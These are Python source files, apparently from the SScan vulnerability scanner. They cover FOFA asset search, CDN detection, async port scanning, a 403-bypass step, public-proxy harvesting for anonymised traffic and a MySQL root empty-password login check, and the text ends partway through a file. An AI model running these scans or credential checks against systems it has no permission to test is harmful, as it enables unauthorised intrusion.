executor = ThreadPoolExecutor(self.args.t)
tasks = [loop.run_in_executor(executor, self.scan_worker, item) for item in self.url_list]
# 这一步很重要,使用loop.run_in_executor()函数: 内部接受的是阻塞的线程池,执行的函数,传入的参数
loop.run_until_complete(asyncio.wait(tasks))
loop.close()
# 扫描完成后, 计算 self._403_url 的大小
if len(self._403_url) < 20:
logger.log("DEBUG", f'对 {self.base_url} 进行 403 绕过测试')
for resp in self._403_url:
self.bypass_403(resp)
# 等待所有的任务完成
for key in self.results.keys():
# todo 为何?
# 超过5个网址在这个文件夹下发现,保留第一个
if len(self.results[key]) > 5:
self.results[key] = self.results[key][:1]
return self.base_url.lstrip('unknown://').rstrip(':None'), self.results
except Exception as e:
logger.log('ERROR', f'[scan exception] {e}')
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
import re
import json
import ipaddress
from urllib.parse import urlparse
from lib.config.log import logger
from lib.config.setting import fofaApi, default_headers
import requests
import sys
import os
# ctrl c 退出时,屏幕上不输出丑陋的traceback信息
def ctrl_quit(_sig, _frame):
logger.log('ALERT', f'Scan aborted.')
os._exit(0)
def check_fofa():
# 当配置 fofa api 时, 检查api是否可用
if fofaApi['email'] and fofaApi['key']:
logger.log('INFOR', f'正在验证fofa Api...')
email = fofaApi['email']
key = fofaApi['key']
url = "https://fofa.so/api/v1/info/my?email={0}&key={1}".format(email, key)
try:
status = requests.get(url, headers=default_headers, timeout=10, verify=False).status_code
if status != 200:
logger.log('ERROR', f'状态码{status}, 请确保config/setting.py中fofaApi配置正确')
exit(-1)
logger.log('INFOR', f'fofa Api调用正常')
return True
except requests.exceptions.ReadTimeout as e:
logger.log('ERROR', f'请求超时 {e}')
exit(-1)
except requests.exceptions.ConnectionError as e:
logger.log('ERROR', f'网络超时 {e}')
exit(-1)
return False
# 读取rules目录下的相关规则
def read_rules(rule_files):
text_to_find = []
regex_to_find = []
text_to_exclude = []
regex_to_exclude = []
rules_set = set()
rules_set_root_only = set()
p_tag = re.compile('{tag="(.*?)"}')
p_status = re.compile(r'{status=(\d{3})}')
p_content_type = re.compile('{type="(.*?)"}')
p_content_type_no = re.compile('{type_no="(.*?)"}')
_files = rule_files
# 读取规则
for rule_file in _files:
with open(rule_file, 'r', encoding='utf-8') as infile:
vul_type = os.path.basename(rule_file)[:-4]
for url in infile.readlines():
url = url.strip()
if url.startswith('/'):
_ = p_tag.search(url)
tag = _.group(1) if _ else '' # 没有tag字段时,赋空
_ = p_status.search(url)
status = int(_.group(1)) if _ else 0
_ = p_content_type.search(url)
content_type = _.group(1) if _ else ''
_ = p_content_type_no.search(url)
content_type_no = _.group(1) if _ else ''
root_only = True if url.find('{root_only}') >= 0 else False
rule = (url.split()[0], tag, status, content_type, content_type_no, root_only, vul_type)
if root_only:
if rule not in rules_set_root_only:
rules_set_root_only.add(rule)
else:
logger.log('ERROR', f'Duplicated root only rule: {rule}')
else:
if rule not in rules_set:
rules_set.add(rule)
else:
logger.log('ERROR', f'Duplicated rule: {rule}')
# 读取匹配黑/白名单
re_text = re.compile('{text="(.*)"}')
re_regex_text = re.compile('{regex_text="(.*)"}')
white_file_path = 'pocs/rules/white.list'
if not os.path.exists(white_file_path):
logger.log('ERROR', f'File not exist: {white_file_path}')
return
for _line in open(white_file_path, 'r', encoding='utf-8'):
_line = _line.strip()
if not _line or _line.startswith('#'):
continue
_m = re_text.search(_line)
if _m:
text_to_find.append(_m.group(1))
else:
_m = re_regex_text.search(_line)
if _m:
regex_to_find.append(re.compile(_m.group(1)))
black_file_path = 'pocs/rules/black.list'
if not os.path.exists(black_file_path):
logger.log('ERROR', f'File not exist: {black_file_path}')
return
for _line in open(black_file_path, 'r', encoding='utf-8'):
_line = _line.strip()
if not _line or _line.startswith('#'):
continue
_m = re_text.search(_line)
if _m:
text_to_exclude.append(_m.group(1))
else:
_m = re_regex_text.search(_line)
if _m:
regex_to_exclude.append(re.compile(_m.group(1)))
return text_to_find, regex_to_find, text_to_exclude, regex_to_exclude, rules_set, rules_set_root_only
def ip_to_int(ip):
if isinstance(ip, int):
return ip
try:
ipv4 = ipaddress.IPv4Address(ip)
except Exception as e:
logger.log('ERROR', f'{repr(e)}')
return 0
return int(ipv4)
def load_json(path):
with open(path) as fp:
return json.load(fp)
def clear_queue(this_queue):
try:
while True:
this_queue.get_nowait()
except Exception as e:
return
def get_html(headers, resp):
if headers.get('content-type', '').find('text') >= 0 \
or headers.get('content-type', '').find('html') >= 0:
# or int(headers.get('content-length', '0')) <= 20480: # 1024 * 20
# 解决中文乱码
html_doc = decode_response_text(resp.content)
else:
html_doc = ''
return html_doc
# 解决中文乱码
def decode_response_text(txt, charset=None):
if charset:
try:
return txt.decode(charset)
except Exception as e:
pass
for _ in ['UTF-8', 'GBK', 'GB2312', 'iso-8859-1', 'big5']:
try:
return txt.decode(_)
except Exception as e:
pass
try:
return txt.decode('ascii', 'ignore')
except Exception as e:
pass
raise Exception('Fail to decode response Text')
def get_domain_sub(host):
if re.search(r'\d+\.\d+\.\d+\.\d+', host.split(':')[0]):
return ''
else:
return host.split('.')[0]
def save_script_result(self, status, url, title, vul_type=''):
if url not in self.results:
self.results[url] = []
_ = {'status': status, 'url': url, 'title': title, 'vul_type': vul_type}
self.results[url].append(_)
def escape(html):
return html.replace('&', '&').\
replace('<', '<').replace('>', '>').\
replace('"', '"').replace("'", ''')
# 计算给定URL的深度,返回元组(URL, depth)
def cal_depth(self, url):
if url.find('#') >= 0:
url = url[:url.find('#')] # cut off fragment
if url.find('?') >= 0:
url = url[:url.find('?')] # cut off query string
# 当存在一下三种情况时,判断不是当前超链不是当前域名,或者没有http服务,则不加入队列
if url.startswith('//'):
return '', 10000 # //www.baidu.com/index.php
if not urlparse(url, 'http').scheme.startswith('http'):
return '', 10000 # no HTTP protocol
if url.lower().startswith('http'):
_ = urlparse(url, 'http')
if _.netloc == self.host: # same hostname
url = _.path
else:
return '', 10000 # not the same hostname
while url.find('//') >= 0:
url = url.replace('//', '/')
if not url:
return '/', 1 # http://www.example.com
if url[0] != '/':
url = '/' + url
url = url[: url.rfind('/') + 1]
if url.split('/')[-2].find('.') > 0:
url = '/'.join(url.split('/')[:-2]) + '/'
depth = url.count('/')
return url, depth
def get_host(url):
if url.find('://') < 0:
netloc = url[:url.find('/')] if url.find('/') > 0 else url
scheme = 'http'
else:
scheme, netloc, path, params, query, fragment = urlparse(url, 'http')
# host port
if netloc.find(':') >= 0:
_ = netloc.split(':')
host = _[0]
else:
host = netloc
return host, scheme
'''
验证是否为内网IP
私有IP: A类 10.0.0.0-10.255.255.255
B类 172.16.0.0-172.31.255.255
C类 192.168.0.0-192.168.255.255
当然,还有 127.0.0.1 这个环回地址
'''
def intranet_ip(ip):
if re.match(r"^10\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[0-9])\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[0-9])\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[0-9])$", ip):
return True
if re.match(r"^172\.(1[6789]|2[0-9]|3[01])\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[0-9])\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[0-9])$", ip):
return True
if re.match(r"^192\.168\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[0-9])\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[0-9])$", ip):
return True
if ip == '127.0.0.1':
return True
# 根据指定的掩码,添加ip
def add_ip(args, queue_targets):
ip_subnet = []
# 筛选目标中的ip, 当指定其它掩码时,根据该ip添加目标(当目标存在cdn时不会添加该段的其它目标)
ip_targets = []
for target in queue_targets:
if re.match(r".*(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).*",
target):
host, scheme = get_host(target)
ip_targets.append(host)
# 当指定子网掩码时的处理逻辑, 将对应网段ip加入处理目标中
if args.network != 32:
for ip in ip_targets:
if ip.find('/') > 0: # 网络本身已经处理过 118.193.98/24
continue
_network = u'%s/%s' % ('.'.join(ip.split('.')[:3]), args.network)
if _network in ip_targets:
continue
ip_targets.append(_network)
if args.network >= 20:
sub_nets = [ipaddress.IPv4Network(u'%s/%s' % (ip, args.network), strict=False).hosts()]
else:
sub_nets = ipaddress.IPv4Network(u'%s/%s' % (ip, args.network), strict=False).subnets(new_prefix=22)
for sub_net in sub_nets:
if sub_net in ip_targets:
continue
if type(sub_net) == ipaddress.IPv4Network: # add network only
ip_targets.append(str(sub_net))
for _ip in sub_net:
_ip = str(_ip)
if _ip not in ip_targets:
ip_subnet.append(_ip)
return ip_subnet
--- FILE SEPARATOR ---
# -*- coding:utf-8 -*-
# !/usr/bin/python3
# @Time : 2021/2/22 21:46
# @Author : yhy
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
yellow = '\033[01;33m'
white = '\033[01;37m'
green = '\033[01;32m'
blue = '\033[01;34m'
red = '\033[1;31m'
end = '\033[0m'
version = 'v0.8'
message = white + '{' + red + version + ' #dev' + white + '}'
SScan_banner = f"""{yellow}
SScan is a slow sensitive information detection and vulnerability scanning program.{green}
_____ _____
/ ____/ ____|
| (___| (___ ___ __ _ _ __ {message}{blue}
\___ \\___ \ / __/ _` | '_ \
____) |___) | (_| (_| | | | |
|_____/_____/ \___\__,_|_| |_|
{red}By yhy(https://github.com/yhy0/SScan.git) {blue}
"""
--- FILE SEPARATOR ---
# -*- coding:utf-8 -*-
# !/usr/bin/python3
# @Time : 2021/3/7 14:54
# @Author : yhy
from lib.config.datatype import AttribDict
fofa_info = AttribDict()
--- FILE SEPARATOR ---
'''
使用oneforall中的配置
https://github.com/shmilylty/OneForAll/blob/master/config/log.py
'''
import sys
import pathlib
from loguru import logger
# 路径设置
relative_directory = pathlib.Path.cwd() # sscan代码相对路径
log_save_dir = relative_directory.joinpath('logs') # 日志结果保存目录
log_path = log_save_dir.joinpath(f'sscan.log') # sscan日志保存路径
LOG_TO_FILE = True # 是否输出到文件
# 日志配置
# 终端日志输出格式
stdout_fmt = '\r<cyan>{time:YYYY-MM-DD HH:mm:ss,SS}</cyan> ' \
'[<level>{level: <5}</level>] ' \
'<blue>{module}</blue>:<cyan>{line}</cyan> - ' \
'<level>{message}</level> '
# 日志文件记录格式
logfile_fmt = '<light-green>{time:YYYY-MM-DD HH:mm:ss,SSS}</light-green> ' \
'[<level>{level: <5}</level>] ' \
'<blue>{module}</blue>.<blue>{function}</blue>:' \
'<blue>{line}</blue> - <level>{message}</level>'
logger.remove()
logger.level(name='TRACE', color='<cyan><bold>', icon='✏️')
logger.level(name='DEBUG', color='<blue><bold>', icon='🐞 ')
logger.level(name='INFOR', no=20, color='<green><bold>', icon='ℹ️')
logger.level(name='QUITE', no=25, color='<green><bold>', icon='🤫 ')
logger.level(name='ALERT', no=30, color='<yellow><bold>', icon='⚠️')
logger.level(name='ERROR', color='<red><bold>', icon='❌️')
logger.level(name='FATAL', no=50, color='<RED><bold>', icon='☠️')
# 如果你想在命令终端静默运行OneForAll,可以将以下一行中的level设置为QUITE
# 命令终端日志级别默认为INFOR
# 默认为线程安全,但不是异步或多进程安全的,添加参数 enqueue=True 即可:
logger.add(sys.stderr, level='INFOR', format=stdout_fmt, enqueue=True)
# 是否输出到文件
if LOG_TO_FILE:
logger.add(log_path, level='DEBUG', format=logfile_fmt, enqueue=True, encoding='utf-8')
--- FILE SEPARATOR ---
# -*- coding:utf-8 -*-
# !/usr/bin/python3
# @Time : 2021/2/25 10:44
# @Author : yhy
import asyncio
import random
import platform
from lib.common.utils import get_host
# 进度条设置
from rich.progress import (
BarColumn,
TimeRemainingColumn,
TransferSpeedColumn,
Progress,
)
# 使用协程进行端口扫描
class PortScan(object):
def __init__(self, targets, rate=2000, timeout=3):
super(PortScan, self).__init__()
self.targets = targets
self.hosts = []
self.rate = rate # 限制并发量
self.timeout = timeout
self.result = []
self.process = Progress(
"[progress.description]{task.description}",
BarColumn(),
"[progress.percentage]{task.percentage:>3.1f}%",
"•",
"[bold green]{task.completed}/{task.total}",
"•",
TransferSpeedColumn(),
"•",
TimeRemainingColumn(),
transient=True, # 100%后隐藏进度条
)
self.progress_bar = self.process.add_task("[cyan]port scan...", total=len(self.targets))
async def async_port_check(self, semaphore, target):
# target ('127.0.0.1', 8080, 'http', '/', 8080)
async with semaphore:
host, port = target[0], target[1]
try:
conn = asyncio.open_connection(host, port)
reader, writer = await asyncio.wait_for(conn, timeout=self.timeout)
conn.close()
# '127.0.0.1 80' open 'unknown' '/test.html' 80
return host, port, 'open', target[2], target[3], target[4]
except Exception:
conn.close()
return host, port, 'close', target[2], target[3], target[4]
# 回调函数,更新进度条,存储开放的端口
def callback(self, future):
# future.result() '127.0.0.1' 80 open 'unknown' '/test.html' 80
result = future.result()
self.process.advance(self.progress_bar, advance=1)
if result[2] == "open":
self.result.append(result)
else:
pass
def async_tcp_port_scan(self):
try:
sem = asyncio.Semaphore(self.rate) # 限制并发量
loop = asyncio.get_event_loop()
# self.targets [('127.0.0.1', 8080, 'http', '/', 8080), ('www.baidu.cn', 80, 'unknown', '/', 80), ('www.baidu.cn', 443, 'unknown', '/', 443)]
# 打乱一下,随机排序
random.shuffle(self.targets)
tasks = list()
with self.process:
for target in self.targets:
task = asyncio.ensure_future(self.async_port_check(sem, target))
task.add_done_callback(self.callback)
tasks.append(task)
if platform.system() != "Windows":
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
loop.run_until_complete(asyncio.wait(tasks))
except Exception:
pass
return self.result
--- FILE SEPARATOR ---
# -*- coding:utf-8 -*-
# !/usr/bin/python3
# @Time : 2021/2/22 21:47
# @Author : yhy
--- FILE SEPARATOR ---
# -*- coding:utf-8 -*-
# !/usr/bin/python3
# @Time : 2021/3/7 15:15
# @Author : yhy
import aiohttp
import asyncio
from functools import partial
import random
import re
import json
import platform
import base64
from concurrent.futures import ThreadPoolExecutor
from lib.common.connectionPool import conn_pool
from lib.config.setting import fofaApi, fofaSize, USER_AGENTS, fofa_list, fofaCountry
from lib.config.log import logger
# 进度条设置
from rich.progress import (
BarColumn,
TimeRemainingColumn,
TransferSpeedColumn,
Progress,
)
class Fofa:
def __init__(self, targets, fofa_result):
super(Fofa, self).__init__()
self.email = fofaApi['email']
self.key = fofaApi['key']
self.fofa_result = fofa_result
self.targets = targets
self.result_urls = [] # fofa 查询到的web服务列表
self.urls_list = [] # 去重
self.life_urls = [] # 验证存活的web服务列表
self.urls = [] # fofa查询的 url 列表, 供异步协程使用
self.count = 30 # fofa 一次性查多少个
self.session = conn_pool() # 使用连接池
self.headers = {
"Cache-Control": "max-age=0",
"User-Agent": random.choice(USER_AGENTS),
"Upgrade-Insecure-Requests": "1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
}
self.process = Progress(
"[progress.description]{task.description}",
BarColumn(),
"[progress.percentage]{task.percentage:>3.1f}%",
"•",
"[bold green]{task.completed}/{task.total}",
"•",
TransferSpeedColumn(),
"•",
TimeRemainingColumn(),
transient=True, # 100%后隐藏进度条
)
self.fofa_progress_bar = self.process.add_task("[cyan]FOFA search...", total=len(self.targets))
self.web_progress_bar = None
def run(self):
try:
with self.process:
self.target_formatting() # fofa 查询url 初始化
loop = asyncio.get_event_loop()
loop.run_until_complete(self.fetch_all(loop)) # fofa 搜索
self.session.close()
self.is_life() # 对fofa搜到的结果,取出其中的web服务,然后对web服务进行验证是否可以访问
except Exception as e:
logger.log("ERROR", e)
return self.life_urls
# 为了防止查询过快被fofa封IP, 这里将目标分割,每30个为一组,组内使用 || 语法拼接,一次性查询多个
def target_formatting(self):
for i in range(0, len(self.targets), self.count):
keyword = ''
targets = self.targets[i:i + self.count]
for host in targets:
host = host.replace('\n', '').replace('\r', '').strip()
keyword += f'"{host}" || '
keyword = keyword[:-4] # 去除最后的 ||
keywordsBs = base64.b64encode(keyword.encode('utf-8'))
keywordsBs = keywordsBs.decode('utf-8')
url = "https://fofa.so/api/v1/search/all?email={0}&key={1}&qbase64={2}&full=true&fields=ip,title,port,domain,protocol,host,country,header&size={3}".format(
self.email, self.key, keywordsBs, fofaSize)
self.urls.append(url)
# 回调函数, 刷新进度条
def callback(self, future, progress_bar, count):
self.process.advance(progress_bar, advance=count)
async def fetch_all(self, loop):
# loop = asyncio.get_event_loop()
# asyncio.set_event_loop(loop)
tasks = []
# 写完才发现 aiohttp 不支持https代理, 改用 loop.run_in_executor()函数 执行阻塞的requests库
# async with aiohttp.ClientSession(connector=aiohttp.TCPConnector(ssl=False), headers=headers) as session:
threads = ThreadPoolExecutor(10)
for url in self.urls:
# task = asyncio.ensure_future(self.fetch(session, url, sem))
task = loop.run_in_executor(threads, self.fetch, url)
task.add_done_callback(partial(self.callback, progress_bar=self.fofa_progress_bar, count=self.count))
tasks.append(task)
if platform.system() != "Windows":
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
await asyncio.wait(tasks)
def fetch(self, url):
try:
self.session.headers = self.headers
# self.session.proxies = {
# "https": "http://127.0.0.1:8080"
# }
response = self.session.get(url, timeout=10)
if response.status_code == 200:
datas = json.loads(response.text)
# 查询结果没有出错时
if not datas['error']:
self.target_info(datas['results'])
else:
logger.log("ERROR", f'fofa 查询失败,{response.status_code }')
except Exception as e:
logger.log("ERROR", e)
pass
def target_info(self, datas):
for data in datas:
# ip,title,port,domain,protocol,host,country,header
# ['127.0.0.1', 'Welcome to CentOS', '443', '', '', '127.0.0.1:443', 'CN', 'HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4833\r\nAccept-Ranges: bytes\r\nContent-Type: text/html\r\nDate: Sun, 22 Nov 2020 10:40:22 GMT\r\nEtag: "53762af0-12e1"\r\nLast-Modified: Fri, 16 May 2014 15:12:48 GMT\r\nServer: nginx/1.16.1']
# 只要限定国家的信息, 默认为CN
if data[6] == fofaCountry:
# if data[4] == "http" or data[4] == "https" or "http" in data[5]:
if 'HTTP/1.' in data[7]:
if "http://" in data[5] or "https://" in data[5]:
url = data[5]
elif not data[4]:
url = "http://{1}".format(data[4], data[5])
else:
url = "{0}://{1}".format(data[4], data[5])
self.result_urls.append(url)
async def crawler(self, url, semaphore):
async with semaphore:
try:
async with aiohttp.ClientSession(connector=aiohttp.TCPConnector(ssl=False),
headers=self.headers) as session:
async with session.get(url, timeout=6) as resp:
if url in self.urls_list or url in fofa_list: # 已存在
return
fofa_list.append(url)
text = await resp.text()
m = re.search('<title>(.*?)</title>', text)
title = m.group(1) if m else ''
status = resp.status
if status == 200 or status == 404 or status == 403:
self.urls_list.append(url)
self.life_urls.append((url, title))
self.fofa_result.put((url, title))
except Exception:
pass
# 筛选存活的web服务
def is_life(self):
if len(self.result_urls) == 0:
return
self.fofa_progress_bar = self.process.add_task("[cyan]FOFA Web results verify valid...",
total=len(self.result_urls))
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
sem = asyncio.Semaphore(2000) # 限制并发量
tasks = []
for url in self.result_urls:
task = loop.create_task(self.crawler(url, sem))
task.add_done_callback(partial(self.callback, progress_bar=self.fofa_progress_bar, count=1))
tasks.append(task)
loop.run_until_complete(asyncio.wait(tasks))
--- FILE SEPARATOR ---
'''
判断cdn
参考oneforall
https://github.com/shmilylty/OneForAll/blob/master/modules/iscdn.py
'''
import socket
from lib.config import setting
from lib.config.log import logger
import requests
requests.packages.urllib3.disable_warnings()
import re
import asyncio
import ipaddress
import geoip2.database
# 忽略https证书验证
import ssl
if hasattr(ssl, '_create_unverified_context'):
ssl._create_default_https_context = ssl._create_unverified_context
import dns.resolver
from urllib.parse import urlparse
from concurrent.futures import ThreadPoolExecutor
from lib.common.utils import load_json, get_host, intranet_ip
data_dir = setting.data_storage_dir
# from https://github.com/al0ne/Vxscan/blob/master/lib/iscdn.py
cdn_ip_cidr = load_json(data_dir.joinpath('cdn_ip_cidr.json'))
cdn_asn_list = load_json(data_dir.joinpath('cdn_asn_list.json'))
# from https://github.com/Qclover/CDNCheck/blob/master/checkCDN/cdn3_check.py
cdn_cname_keyword = load_json(data_dir.joinpath('cdn_cname_keywords.json'))
cdn_header_key = load_json(data_dir.joinpath('cdn_header_keys.json'))
def get_cname(cnames, cname): # get cname
try:
answer = dns.resolver.resolve(cname, 'CNAME', lifetime=10)
cname = [_.to_text() for _ in answer][0]
cnames.append(cname)
get_cname(cnames, cname)
except Exception:
pass
def get_cnames(cnames, url): # get all cname
if url.find('://') < 0:
netloc = url[:url.find('/')] if url.find('/') > 0 else url
else:
scheme, netloc, path, params, query, fragment = urlparse(url, 'http')
try:
resolver = dns.resolver.Resolver()
resolver.timeout = 1
resolver.lifetime = 1
answer = resolver.resolve(netloc,'CNAME')
except Exception:
cnames = None
else:
cname = [_.to_text() for _ in answer][0]
cnames.append(cname)
get_cname(cnames, cname)
return str(cnames)
# get headers url 要以http:// 或者https:// 开头,这里简单判断一下,没有则加上http://
def get_headers(url):
try:
if not url.startswith("http://") and not url.startswith("https://"):
url = "http://" + url
response = requests.get(url, headers=setting.default_headers, timeout=3, verify=False)
headers = str(response.headers).lower()
except Exception:
headers = None
return headers
def get_ip_list(url):
host, scheme = get_host(url)
try:
ip = socket.gethostbyname(host)
# 判断解析出来的ip是否为内网ip和是否已存在
if not intranet_ip(ip):
return ip
return ip
except Exception:
logger.log('ERROR', f'Invalid domain: {url}')
return 'Invalid'
def check_cdn_cidr(ip):
try:
ip = ipaddress.ip_address(ip)
except Exception as e:
logger.log('DEBUG', f'{e}')
return False
for cidr in cdn_ip_cidr:
if ip in ipaddress.ip_network(cidr):
return True
def check_cname_keyword(cname):
for name in cname:
for keyword in cdn_cname_keyword.keys():
if keyword in name.lower():
return True
def check_header_key(headers):
for key in cdn_header_key:
if key in headers:
return True
def check_cdn_asn(ip):
try:
# https://www.maxmind.com/en/accounts/410249/geoip/downloads
with geoip2.database.Reader(setting.data_storage_dir.joinpath('GeoLite2-ASN.mmdb')) as reader:
response = reader.asn(ip)
asn = response.autonomous_system_number
if str(asn) in cdn_asn_list:
return True
except Exception:
return False
def run(target, checkcdn, progress_bar, progress):
flag = False
targets = []
ip = get_ip_list(target)
# 无效域名不加入目标
if ip == 'Invalid':
progress.advance(progress_bar)
return [], ''
targets.append(target)
# cdn 是否检测
if checkcdn:
# 只对域名做 CDN 检测,排除目标中的ip
if re.match(r".*(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).*", target):
return [target], target
data = [{'cname': get_cnames([], target), 'headers': get_headers(target), 'ip': ip}]
for index, item in enumerate(data):
cname = item.get('cname')
if cname:
if check_cname_keyword(cname):
flag = True
break
try:
headers = item.get('headers')
if headers:
headers = eval(headers).keys()
if check_header_key(headers):
flag = True
break
except Exception as e:
logger.log('DEBUG', f'{e}')
pass
ip_tmp = item.get('ip')
if check_cdn_cidr(ip_tmp) or check_cdn_asn(ip_tmp):
flag = True
break
progress.advance(progress_bar)
# 存在cdn 只检测url,否则,url、ip一起检测
if flag:
return targets, target
else:
targets.append(ip)
return targets, target
# 5000 多域名解析和检测cdn用时 3 分钟多
def check_cdn(original_targets, checkcdn):
targets = [] # 有效的目标,加上解析出的ip
valid_targets = [] # 有效的目标
# 创建一个事件循环
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
# 创建一个线程池,开启100个线程
threads = ThreadPoolExecutor(100)
# 这一步很重要, 使用线程池访问,使用loop.run_in_executor()函数:内部接受的是阻塞的线程池,执行的函数,传入的参数
tasks = []
# 进度条设置
from rich.progress import (
BarColumn,
TimeRemainingColumn,
TransferSpeedColumn,
Progress,
)
progress = Progress(
"[progress.description]{task.description}",
BarColumn(),
"[progress.percentage]{task.percentage:>3.1f}%",
"•",
"[bold green]{task.completed}/{task.total}",
"•",
TransferSpeedColumn(),
"•",
TimeRemainingColumn(),
transient=True, # 100%后隐藏进度条
)
with progress:
progress_bar = progress.add_task("[cyan]DNS, CDN detection...", total=len(original_targets))
for target in original_targets:
target = target.replace('\n', '').replace('\r', '').strip()
tasks.append(loop.run_in_executor(threads, run, target, checkcdn, progress_bar, progress))
if len(tasks) > 0:
# 使用uvloop加速asyncio, 目前不支持Windows
import platform
if platform.system() != "Windows":
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
# 等待所有的任务完成
tasks_result = asyncio.wait(tasks)
loop.run_until_complete(tasks_result)
for i in tasks:
url_ip_list, valid_domain = i.result()
targets.extend(url_ip_list)
if valid_domain:
valid_targets.append(valid_domain)
return list(set(targets)), valid_targets
--- FILE SEPARATOR ---
# -*- coding:utf-8 -*-
# !/usr/bin/python3
# @Time : 2021/2/3 17:16
# @Author : yhy
# 参考 https://github.com/s7ckTeam/Glass/blob/main/lib/proxy.py
import os
import ssl
import time
import json
import random
import urllib3
import requests
import threading
from lib.config.setting import USER_AGENTS, threadNum, relative_directory, proxyList, country
from lib.config.log import logger
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings()
lock = threading.Lock()
# 验证代理是否为高质量代理
class ProxyInfo(threading.Thread):
def __init__(self, types, host, port, sem):
super(ProxyInfo, self).__init__()
self.types = types
self.host = host
self.port = port
self.sem = sem
self.headers = {
"User-Agent": random.choice(USER_AGENTS),
}
def run(self):
s = requests.Session()
s.keep_alive = False # 关闭多余连接
s.headers = self.headers
proxy = f"{self.types}://{self.host}:{self.port}"
s.proxies = {
self.types: proxy
}
try:
req = s.get("https://httpbin.org/ip", timeout=5)
lock.acquire()
codes = req.text
if ',' in codes:
pass
elif self.host in codes:
proxyList.append({self.types: proxy})
req.close()
lock.release()
except (requests.exceptions.ConnectTimeout, requests.exceptions.ReadTimeout, requests.exceptions.Timeout,
requests.exceptions.SSLError, requests.exceptions.ConnectionError, ssl.SSLError, AttributeError,
ConnectionRefusedError, urllib3.exceptions.ReadTimeoutError, urllib3.exceptions.ProtocolError,):
pass
except KeyboardInterrupt:
lock.release()
pass
self.sem.release()
def getPage():
s = requests.Session()
s.headers = {
"User-Agent": random.choice(USER_AGENTS),
}
s.keep_alive = False
proxyGit = "https://raw.githubusercontent.com/fate0/proxylist/master/proxy.list"
proxyPage = "http://proxylist.fatezero.org/proxy.list"
datasGit = []
datasPage = []
try:
datasGit = s.get(proxyGit).text.split('\n')
except requests.exceptions.ConnectionError:
try:
datasPage = s.get(proxyPage).text.split('\n')
except requests.exceptions.ConnectionError as e:
logger.log('ERROR', f'网络超时,代理获取失败,请重新获取 {e}')
exit(0)
datas = datasGit + datasPage
proxyDatas = []
for proxy_str in datas:
if proxy_str:
proxy_json = json.loads(proxy_str)
if country == "cn":
if proxy_json['country'] == "CN":
host = proxy_json['host']
port = proxy_json['port']
types = proxy_json['type']
proxyDatas.append([types, host, port])
else:
host = proxy_json['host']
port = proxy_json['port']
types = proxy_json['type']
proxyDatas.append([types, host, port])
return proxyDatas
def getProxy(files):
logger.log('INFOR', f'正在获取代理IP')
proxyDatas = getPage()
logger.log('INFOR', f'总共获取{len(proxyDatas)}条代理IP')
logger.log('INFOR', f'正在验证高质量代理IP')
threads = []
sem = threading.Semaphore(threadNum)
try:
for i in proxyDatas:
types = i[0]
host = i[1]
port = i[2]
sem.acquire()
t = ProxyInfo(types, host, port, sem)
t.setDaemon(True)
threads.append(t)
t.start()
for t in threads:
t.join()
except KeyboardInterrupt:
pass
if proxyList:
logger.log('INFOR', f'获取{len(proxyList)}条高质量IP')
for p in proxyList:
with open(files, 'a', encoding="utf-8") as f:
f.write(str(p))
f.write('\n')
else:
logger.log('ERROR', f'在线获取失败')
def checkProxyFile():
files = os.path.join(relative_directory, 'proxy.txt')
if os.path.isfile(files):
fileTamp = os.stat(files).st_mtime # 获取文件创建时间
timeArray = time.localtime(fileTamp)
fileTime = time.strftime("%Y%m%d%H%M", timeArray)
osTime = time.strftime("%Y%m%d%H%M", time.localtime())
contrast = int(osTime) - int(fileTime)
# 代理文件创建超过15分钟,才会重新获取代理
if contrast >= 15:
os.remove(files)
getProxy(files)
else:
try:
with open(files, 'r', encoding="utf-8") as f:
for pro in f.readlines():
p = pro.strip()
_proxy = eval(p)
proxyList.append(_proxy)
logger.log('INFOR', f'共获取 {len(proxyList)} 条高质量代理IP')
except FileNotFoundError as e:
logger.log('DEBUG', f'{str(e)}')
pass
else:
getProxy(files)
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
# mysql空口令
import pymysql
from lib.common.utils import save_script_result
ports_to_check = 3306 # 默认扫描端口
def do_check(self, url):
if url != '/':
return
port = 3306
if self.scheme == 'mysql' and self.port != 3306: # 非标准端口
port = self.port
elif 3306 not in self.ports_open:
return
try:
conn = pymysql.connect(host=self.host, user='root', password='', charset='utf8', autocommit=True)
conn.close()
save_script_result(self, '', 'mysql://%s:%s' % (self.host, port), '', 'Mysql empty password')
except Exception as e:
pass
--- FILE SEPARATOR ---
# -*- coding:utf-8 -*-
# !/usr/bin/python3
# @Time : 2021/2/25 10:44
# @Author : yhy
import asyncio
import random
import platform
from lib.common.utils import get_host
# 进度条设置
from rich.progress import (
BarColumn,
TimeRemainingColumn,
TransferSpeedColumn,
Progress,
)
# 使用协程进行端口扫描
class PortScan(object):
def __init__(self, targets, port_list, rate=2000, timeout=3):
super(PortScan, self).__init__()
self.targets = targets
self.hosts = []
self.rate = rate # 限制并发量
self.timeout = timeout
self.open_list = {}
self.port_list = port_list # 待扫描的端口列表
self.process = Progress(
"[progress.description]{task.description}",
